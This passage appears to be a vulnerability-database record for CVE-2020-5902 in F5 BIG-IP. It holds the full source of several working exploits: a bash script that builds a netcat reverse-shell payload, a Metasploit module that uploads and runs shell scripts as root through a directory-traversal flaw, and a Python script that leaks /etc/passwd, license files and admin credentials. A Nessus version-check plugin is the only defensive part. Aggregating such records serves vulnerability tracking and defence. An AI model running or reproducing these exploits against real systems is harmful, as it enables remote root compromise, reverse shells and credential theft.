| openssl x509 -outform DER >$server.der\r\n\r\n keytool -import \\\r\n -alias $server \\\r\n -keystore keystore \\\r\n -storepass changeit \\\r\n -noprompt \\\r\n -file $PWD/$server.der\r\nelse\r\n echo \"$server.der already exists. skipping extraction step\"\r\nfi\r\n\r\njava -jar ysoserial-master-SNAPSHOT.jar \\\r\n CommonsCollections6 \\\r\n \"/bin/nc -e /bin/bash $localip $port\" > nc.class\r\n\r\nxxd -p nc.class | xargs | sed -e 's/ //g' | dd conv=ucase 2>/dev/null > payload.hex\r\n\r\nif [[ ! -f f5RCE.class ]]\r\nthen\r\n echo \"Building exploit\"\r\n javac -cp hsqldb.jar f5RCE.java\r\nfi\r\n\r\njava -cp hsqldb.jar:. \\\r\n -Djavax.net.ssl.trustStore=keystore \\\r\n -Djavax.net.ssl.trustStorePassword=changeit \\\r\n f5RCE $server payload.hex", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://www.exploit-db.com/download/48642"}], "metasploit": [{"lastseen": "2020-08-10T10:11:57", "bulletinFamily": "exploit", "description": "This module exploits a directory traversal in F5's BIG-IP Traffic Management User Interface (TMUI) to upload a shell script and execute it as the Unix root user. Unix shell access is obtained by escaping the restricted Traffic Management Shell (TMSH). The escape may not be reliable, and you may have to run the exploit multiple times. Sorry! Versions 11.6.1-11.6.5, 12.1.0-12.1.5, 13.1.0-13.1.3, 14.1.0-14.1.2, 15.0.0, and 15.1.0 are known to be vulnerable. Fixes were introduced in 11.6.5.2, 12.1.5.2, 13.1.3.4, 14.1.2.6, and 15.1.0.4. Tested against the VMware OVA release of 14.1.2.\n", "modified": "2020-07-17T11:26:00", "published": "2020-07-05T20:22:15", "id": "MSF:EXPLOIT/LINUX/HTTP/F5_BIGIP_TMUI_RCE", "href": "", "type": "metasploit", "title": "F5 BIG-IP TMUI Directory Traversal and File Upload RCE", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = AverageRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'F5 BIG-IP TMUI Directory Traversal and File Upload RCE',\n 'Description' => %q{\n This module exploits a directory traversal in F5's BIG-IP Traffic\n Management User Interface (TMUI) to upload a shell script and execute\n it as the Unix root user.\n\n Unix shell access is obtained by escaping the restricted Traffic\n Management Shell (TMSH). The escape may not be reliable, and you may\n have to run the exploit multiple times. Sorry!\n\n Versions 11.6.1-11.6.5, 12.1.0-12.1.5, 13.1.0-13.1.3, 14.1.0-14.1.2,\n 15.0.0, and 15.1.0 are known to be vulnerable. Fixes were introduced\n in 11.6.5.2, 12.1.5.2, 13.1.3.4, 14.1.2.6, and 15.1.0.4.\n\n Tested against the VMware OVA release of 14.1.2.\n },\n 'Author' => [\n 'Mikhail Klyuchnikov', # Discovery\n 'wvu' # Analysis and exploit\n ],\n 'References' => [\n ['CVE', '2020-5902'],\n ['URL', 'https://support.f5.com/csp/article/K52145254'],\n ['URL', 'https://www.ptsecurity.com/ww-en/about/news/f5-fixes-critical-vulnerability-discovered-by-positive-technologies-in-big-ip-application-delivery-controller/']\n ],\n 'DisclosureDate' => '2020-06-30', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Unix Command',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'\n }\n ],\n [\n 'Linux Dropper',\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'CMDSTAGER::FLAVOR' => :bourne,\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n ]\n ],\n 'DefaultTarget' => 1,\n 'DefaultOptions' => {\n 'SSL' => true,\n 'WfsDelay' => 5\n },\n 'Notes' => {\n 'Stability' => [SERVICE_RESOURCE_LOSS], # May disrupt the service\n 'Reliability' => [UNRELIABLE_SESSION], # Seems a little finicky\n 'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n Opt::RPORT(443),\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n\n register_advanced_options([\n OptString.new('WritableDir', [true, 'Writable directory', '/tmp'])\n ])\n\n # XXX: https://github.com/rapid7/metasploit-framework/issues/12963\n import_target_defaults\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => dir_trav('/tmui/locallb/workspace/fileRead.jsp'),\n 'vars_post' => {\n 'fileName' => '/etc/f5-release'\n }\n )\n\n unless res\n return CheckCode::Unknown('Target did not respond to check request.')\n end\n\n unless res.code == 200 && /BIG-IP release (?<version>[\\d.]+)/ =~ res.body\n return CheckCode::Safe('Target did not respond with BIG-IP version.')\n end\n\n # If we got here, the directory traversal was successful\n CheckCode::Vulnerable(\"Target is running BIG-IP #{version}.\")\n end\n\n def exploit\n create_alias\n\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager\n end\n ensure\n delete_alias if @created_alias\n end\n\n def create_alias\n print_status('Creating alias list=bash')\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => dir_trav('/tmui/locallb/workspace/tmshCmd.jsp'),\n 'vars_post' => {\n 'command' => 'create cli alias private list command bash'\n }\n )\n\n if res.nil? || (error = parse_error(res))\n case error\n when /private \"list\" \\(list\\) already exists/\n print_error('Alias \"list\" already exists, deleting it')\n delete_alias\n\n # Try to create the alias again\n return create_alias\n when /java\\.lang\\.NullPointerException/\n print_error('Encountered java.lang.NullPointerException, retrying!')\n\n # XXX: Try to create the alias until we're successful\n return create_alias\n end\n\n fail_with(Failure::UnexpectedReply,\n \"Failed to create alias list=bash#{error}\")\n end\n\n @created_alias = true\n\n print_good('Successfully created alias list=bash')\n end\n\n def execute_command(cmd, _opts = {})\n vprint_status(\"Executing command: #{cmd}\")\n\n upload_script(cmd)\n execute_script\n end\n\n def upload_script(cmd)\n print_status(\"Uploading #{script_path}\")\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => dir_trav('/tmui/locallb/workspace/fileSave.jsp'),\n 'vars_post' => {\n 'fileName' => script_path,\n 'content' => cmd\n }\n )\n\n if res.nil? || (error = parse_error(res))\n fail_with(Failure::UnexpectedReply,\n \"Failed to upload #{script_path}#{error}\")\n end\n\n register_file_for_cleanup(script_path)\n\n print_good(\"Successfully uploaded #{script_path}\")\n end\n\n def execute_script\n print_status(\"Executing #{script_path}\")\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => dir_trav('/tmui/locallb/workspace/tmshCmd.jsp'),\n 'vars_post' => {\n 'command' => \"list #{script_path}\"\n }\n }, 3.5)\n\n # No response may mean the service is blocking on payload execution\n return unless res && (error = parse_error(res))\n\n case error\n when /unexpected argument/\n print_error('Alias \"list\" does not exist, attempting to create it again')\n create_alias\n\n # Try to execute the script again... smdh\n return execute_script\n when /java\\.lang\\.NullPointerException/\n print_error('Encountered java.lang.NullPointerException, retrying!')\n\n # XXX: Try to execute the script until we're successful\n return execute_script\n end\n\n print_error(\"Failed to execute #{script_path}#{error}\")\n end\n\n def delete_alias\n print_status('Deleting alias list=bash')\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => dir_trav('/tmui/locallb/workspace/tmshCmd.jsp'),\n 'vars_post' => {\n 'command' => 'delete cli alias private list'\n }\n )\n\n if res.nil? || (error = parse_error(res))\n case error\n when /user alias \\(list admin\\) was not found/\n print_good('Alias \"list\" does not exist or was already deleted')\n return\n when /java\\.lang\\.NullPointerException/\n print_error('Encountered java.lang.NullPointerException, retrying!')\n\n # XXX: Try to delete the alias until we're successful\n return delete_alias\n end\n\n print_warning(\"Failed to delete alias list=bash#{error}\")\n return\n end\n\n print_good('Successfully deleted alias list=bash')\n end\n\n def parse_error(res)\n return unless res\n\n error =\n case res.code\n when 200\n res.get_json_document['error']\n when 500\n # This is usually a java.lang.NullPointerException stack trace\n res.get_html_document.at('//pre')&.text\n else\n res.body\n end\n\n return if error.blank?\n\n \":\\n#{error.strip}\"\n end\n\n def dir_trav(path)\n # PoC courtesy of the referenced F5 advisory: <LocationMatch \".*\\.\\.;.*\">\n normalize_uri(target_uri.path, '/tmui/login.jsp/..;', path)\n end\n\n def script_path\n @script_path ||=\n normalize_uri(datastore['WritableDir'], rand_text_alphanumeric(8..42))\n end\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/f5_bigip_tmui_rce.rb"}], "nessus": [{"lastseen": "2020-08-05T09:28:07", "bulletinFamily": "scanner", "description": "The Traffic Management User Interface (TMUI), also referred to as the\nConfiguration utility, has a Remote Code Execution (RCE) vulnerability\nin undisclosed pages.(CVE-2020-5902)\n\nImpact\n\nThis vulnerability allows for unauthenticated attackers, or\nauthenticated users, with network access to the Configuration utility,\nthrough the BIG-IP management port and/or self IPs, to execute\narbitrary system commands, create or delete files, disable services,\nand/or execute arbitrary Java code. This vulnerability may result in\ncomplete system compromise. The BIG-IP system in Appliance mode is\nalso vulnerable. This issue is not exposed on the data plane; only the\ncontrol plane is affected.\n\nNote : All information present on an infiltrated system should be\nconsidered compromised. This includes, but is not limited to, logs,\nconfigurations, credentials, and digital certificates.\n\nImportant : If your BIG-IP system has TMUI exposed to the Internet and\nit does not have a fixed version of software installed, there is a\nhigh probability that it has been compromised and you should follow\nyour internal incident response procedures. Refer to the Indicatorsof\ncompromise section.", "modified": "2020-07-01T00:00:00", "id": "F5_BIGIP_SOL52145254.NASL", "href": "https://www.tenable.com/plugins/nessus/137918", "published": "2020-07-01T00:00:00", "title": "F5 Networks BIG-IP : TMUI RCE vulnerability (K52145254)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K52145254.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(137918);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/04\");\n\n script_cve_id(\"CVE-2020-5902\");\n script_xref(name:\"IAVA\", value:\"2020-A-0283\");\n\n script_name(english:\"F5 Networks BIG-IP : TMUI RCE vulnerability (K52145254)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The Traffic Management User Interface (TMUI), also referred to as the\nConfiguration utility, has a Remote Code Execution (RCE) vulnerability\nin undisclosed pages.(CVE-2020-5902)\n\nImpact\n\nThis vulnerability allows for unauthenticated attackers, or\nauthenticated users, with network access to the Configuration utility,\nthrough the BIG-IP management port and/or self IPs, to execute\narbitrary system commands, create or delete files, disable services,\nand/or execute arbitrary Java code. This vulnerability may result in\ncomplete system compromise. The BIG-IP system in Appliance mode is\nalso vulnerable. This issue is not exposed on the data plane; only the\ncontrol plane is affected.\n\nNote : All information present on an infiltrated system should be\nconsidered compromised. This includes, but is not limited to, logs,\nconfigurations, credentials, and digital certificates.\n\nImportant : If your BIG-IP system has TMUI exposed to the Internet and\nit does not have a fixed version of software installed, there is a\nhigh probability that it has been compromised and you should follow\nyour internal incident response procedures. Refer to the Indicatorsof\ncompromise section.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K52145254\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution K52145254.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-5902\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"F5 BIG-IP Traffic Management User Interface File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'F5 BIG-IP TMUI Directory Traversal and File Upload RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/01\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"K52145254\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"15.1.0\",\"15.0.0-15.0.1\",\"14.1.0-14.1.2\",\"13.1.0-13.1.3\",\"12.1.0-12.1.5\",\"11.6.1-11.6.5\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"16.0.0\",\"15.1.0.4\",\"15.0.1.4\",\"14.1.2.6\",\"13.1.3.4\",\"12.1.5.2\",\"11.6.5.2\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"15.1.0\",\"15.0.0-15.0.1\",\"14.1.0-14.1.2\",\"13.1.0-13.1.3\",\"12.1.0-12.1.5\",\"11.6.1-11.6.5\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"16.0.0\",\"15.1.0.4\",\"15.0.1.4\",\"14.1.2.6\",\"13.1.3.4\",\"12.1.5.2\",\"11.6.5.2\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"15.1.0\",\"15.0.0-15.0.1\",\"14.1.0-14.1.2\",\"13.1.0-13.1.3\",\"12.1.0-12.1.5\",\"11.6.1-11.6.5\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"16.0.0\",\"15.1.0.4\",\"15.0.1.4\",\"14.1.2.6\",\"13.1.3.4\",\"12.1.5.2\",\"11.6.5.2\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"15.1.0\",\"15.0.0-15.0.1\",\"14.1.0-14.1.2\",\"13.1.0-13.1.3\",\"12.1.0-12.1.5\",\"11.6.1-11.6.5\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"16.0.0\",\"15.1.0.4\",\"15.0.1.4\",\"14.1.2.6\",\"13.1.3.4\",\"12.1.5.2\",\"11.6.5.2\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"15.1.0\",\"15.0.0-15.0.1\",\"14.1.0-14.1.2\",\"13.1.0-13.1.3\",\"12.1.0-12.1.5\",\"11.6.1-11.6.5\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"16.0.0\",\"15.1.0.4\",\"15.0.1.4\",\"14.1.2.6\",\"13.1.3.4\",\"12.1.5.2\",\"11.6.5.2\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"15.1.0\",\"15.0.0-15.0.1\",\"14.1.0-14.1.2\",\"13.1.0-13.1.3\",\"12.1.0-12.1.5\",\"11.6.1-11.6.5\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"16.0.0\",\"15.1.0.4\",\"15.0.1.4\",\"14.1.2.6\",\"13.1.3.4\",\"12.1.5.2\",\"11.6.5.2\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"15.1.0\",\"15.0.0-15.0.1\",\"14.1.0-14.1.2\",\"13.1.0-13.1.3\",\"12.1.0-12.1.5\",\"11.6.1-11.6.5\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"16.0.0\",\"15.1.0.4\",\"15.0.1.4\",\"14.1.2.6\",\"13.1.3.4\",\"12.1.5.2\",\"11.6.5.2\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"15.1.0\",\"15.0.0-15.0.1\",\"14.1.0-14.1.2\",\"13.1.0-13.1.3\",\"12.1.0-12.1.5\",\"11.6.1-11.6.5\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"16.0.0\",\"15.1.0.4\",\"15.0.1.4\",\"14.1.2.6\",\"13.1.3.4\",\"12.1.5.2\",\"11.6.5.2\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"15.1.0\",\"15.0.0-15.0.1\",\"14.1.0-14.1.2\",\"13.1.0-13.1.3\",\"12.1.0-12.1.5\",\"11.6.1-11.6.5\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"16.0.0\",\"15.1.0.4\",\"15.0.1.4\",\"14.1.2.6\",\"13.1.3.4\",\"12.1.5.2\",\"11.6.5.2\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_hole(port:0, extra:bigip_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2020-07-27T13:59:31", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category web applications", "modified": "2020-07-27T00:00:00", "published": "2020-07-27T00:00:00", "id": "1337DAY-ID-34748", "href": "https://0day.today/exploit/description/34748", "title": "F5 Big-IP 13.1.3 Build 0.0.6 - Local File Inclusion Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: F5 Big-IP 13.1.3 Build 0.0.6 - Local File Inclusion\r\n# Exploit Author: Carlos E. Vieira\r\n# Vendor Homepage: https://www.f5.com/products/big-ip-services\r\n# Version: <= 13.1.3\r\n# Tested on: BIG-IP 13.1.3 Build 0.0.6\r\n# CVE : CVE-2020-5902\r\n\r\n#!/usr/bin/env python\r\n\r\nimport requests\r\nimport sys\r\nimport time\r\nimport urllib3\r\nimport json \r\nurllib3.disable_warnings()\r\n\r\nglobal target\r\n\r\ndef checkTarget():\r\n\r\n r = requests.head(target + \"/tmui/login.jsp\", verify=False)\r\n if(r.status_code == 200):\r\n return True\r\n else:\r\n return False\r\n\r\ndef checkVuln():\r\n\r\n r = requests.get(target + \"/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd\", verify=False)\r\n if(r.status_code == 200):\r\n \r\n data = json.loads(r.text)\r\n if(len(data['output']) > 0):\r\n return True \r\n else:\r\n return False\r\n\r\n else:\r\n return False\r\n\r\ndef leakPasswd():\r\n print(\"[+] Leaking /etc/passwd from server\")\r\n time.sleep(2)\r\n exploit('/etc/passwd')\r\n\r\n\r\ndef leakHosts():\r\n print(\"[+] Leaking /etc/hosts from server\")\r\n time.sleep(2)\r\n exploit('/etc/hosts')\r\n\r\ndef leakLicence():\r\n\r\n print(\"[+] Leaking /config/bigip.license from server\")\r\n time.sleep(2)\r\n exploit('/config/bigip.license')\r\n\r\ndef leakAdmin():\r\n\r\n print(\"[+] Leaking admin credentials from server\")\r\n time.sleep(2)\r\n r = requests.get(target + \"/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin\", verify=False)\r\n if(r.status_code == 200):\r\n \r\n data = json.loads(r.text)\r\n if(len(data['output']) > 0 ):\r\n print(data['output'])\r\n else:\r\n print(\"[X] Admin credentials not found\")\r\n else:\r\n print(\"[X] Fail to read file\")\r\n\r\n\r\ndef exploit(file):\r\n \r\n r = requests.get(target + \"/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=\" + file, verify=False)\r\n if(r.status_code == 200):\r\n data = json.loads(r.text)\r\n print(data['output'])\r\n else:\r\n print(\"[X] Fail to read file\")\r\n\r\ndef memoryLeak():\r\n print(\"[!] Leaking tomcat process from server\")\r\n time.sleep(2) \r\n r = requests.get(target + \"/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/proc/self/cmdline\", verify=False)\r\n if(r.status_code == 200):\r\n data = json.loads(r.text)\r\n if(len(data['output'])>0):\r\n print(\"Command: \" + data['output'])\r\n\r\ndef main(host):\r\n\r\n print(\"[+] Check target...\")\r\n global target\r\n target = \"https://\" + host\r\n\r\n check = checkTarget()\r\n if(check):\r\n print(\"[~] Target is available\")\r\n\r\n vuln = checkVuln()\r\n if(vuln):\r\n print(\"[+] Target is vulnerable!\")\r\n\r\n time.sleep(1)\r\n print(\"[~] Leak information from target!\")\r\n time.sleep(1)\r\n leakPasswd()\r\n leakHosts()\r\n leakLicence()\r\n leakAdmin()\r\n memoryLeak()\r\n else:\r\n print(\"[X] Target is't vulnerable\")\r\n\r\n else:\r\n print(\"[x] Target is unavailable\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n if(len(sys.argv) < 2):\r\n print(\"Use: python {} ip/dns\".format(sys.argv[0]))\r\n else:\r\n host = sys.argv[1]\r\n main(host)\n\n# 0day.today [2020-07-27] #", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://0day.today/exploit/34748"}, {"lastseen": "2020-07-20T04:48:46", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category web applications", "modified": "2020-07-07T00:00:00", "published": "2020-07-07T00:00:00", "id": "1337DAY-ID-34646", "href": "https://0day.today/exploit/description/34646", "title": "BIG-IP 15.0.0 < 15.1.0.3 - Traffic Management User Interface (TMUI) Remote Code Execution Exploit", "type": "zdt", "sourceData": "BIG-IP 15.0.0 < 15.1.0.3 / 14.1.0 < 14.1.2.5 / 13.1.0 < 13.1.3.3 / 12.1.0 < 12.1.5.1 / 11.6.1 < 11.6.5.1 - Traffic Management User Interface 'TMUI' Remote Code Execution\r\n\r\n#!/bin/bash\r\n#\r\n# EDB Note Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48642.zip\r\n# \r\n# Exploit Title: F5 BIG-IP Remote Code Execution\r\n# Date: 2020-07-06\r\n# Exploit Authors: Charles Dardaman of Critical Start, TeamARES\r\n# Rich Mirch of Critical Start, TeamARES\r\n# CVE: CVE-2020-5902\r\n#\r\n# Requirements:\r\n# Java JDK\r\n# hsqldb.jar 1.8\r\n# ysoserial https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar\r\n#\r\n\r\nif [[ $# -ne 3 ]]\r\nthen\r\n echo\r\n echo \"Usage: $(basename $0) <server> <localip> <localport>\"\r\n echo\r\n exit 1\r\nfi\r\n\r\nserver=${1?hostname argument required}\r\nlocalip=${2?Locaip argument required}\r\nport=${3?Port argument required}\r\n\r\nif [[ ! -f $server.der ]]\r\nthen\r\n echo \"$server.der does not exist - extracting cert\"\r\n openssl s_client \\\r\n -showcerts \\\r\n -servername $server \\\r\n -connect $server:443 </dev/null 2>/dev/null | openssl x509 -outform DER >$server.der\r\n\r\n keytool -import \\\r\n -alias $server \\\r\n -keystore keystore \\\r\n -storepass changeit \\\r\n -noprompt \\\r\n -file $PWD/$server.der\r\nelse\r\n echo \"$server.der already exists. skipping extraction step\"\r\nfi\r\n\r\njava -jar ysoserial-master-SNAPSHOT.jar \\\r\n CommonsCollections6 \\\r\n \"/bin/nc -e /bin/bash $localip $port\" > nc.class\r\n\r\nxxd -p nc.class | xargs | sed -e 's/ //g' | dd conv=ucase 2>/dev/null > payload.hex\r\n\r\nif [[ ! -f f5RCE.class ]]\r\nthen\r\n echo \"Building exploit\"\r\n javac -cp hsqldb.jar f5RCE.java\r\nfi\r\n\r\njava -cp hsqldb.jar:. \\\r\n -Djavax.net.ssl.trustStore=keystore \\\r\n -Djavax.net.ssl.trustStorePassword=changeit \\\r\n f5RCE $server payload.hex\n\n# 0day.today [2020-07-20] #", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://0day.today/exploit/34646"}, {"lastseen": "2020-07-19T18:05:28", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category remote exploits", "modified": "2020-07-07T00:00:00", "published": "2020-07-07T00:00:00", "id": "1337DAY-ID-34652", "href": "https://0day.today/exploit/description/34652", "title": "F5 BIG-IP TMUI Directory Traversal / File Upload / Code Execution Exploit", "type": "zdt", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = ExcellentRanking\r\n\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStager\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'F5 BIG-IP TMUI Directory Traversal and File Upload RCE',\r\n 'Description' => %q{\r\n This module exploits a directory traversal in F5's BIG-IP Traffic\r\n Management User Interface (TMUI) to upload a shell script and execute\r\n it as the root user.\r\n\r\n Versions 11.6.1-11.6.5, 12.1.0-12.1.5, 13.1.0-13.1.3, 14.1.0-14.1.2,\r\n 15.0.0, and 15.1.0 are known to be vulnerable. Fixes were introduced\r\n in 11.6.5.2, 12.1.5.2, 13.1.3.4, 14.1.2.6, and 15.1.0.4.\r\n\r\n Tested on the VMware OVA release of 14.1.2.\r\n },\r\n 'Author' => [\r\n 'Mikhail Klyuchnikov', # Discovery\r\n 'wvu' # Analysis and exploit\r\n ],\r\n 'References' => [\r\n ['CVE', '2020-5902'],\r\n ['URL', 'https://support.f5.com/csp/article/K52145254'],\r\n ['URL', 'https://www.ptsecurity.com/ww-en/about/news/f5-fixes-critical-vulnerability-discovered-by-positive-technologies-in-big-ip-application-delivery-controller/']\r\n ],\r\n 'DisclosureDate' => '2020-06-30', # Vendor advisory\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => ['unix', 'linux'],\r\n 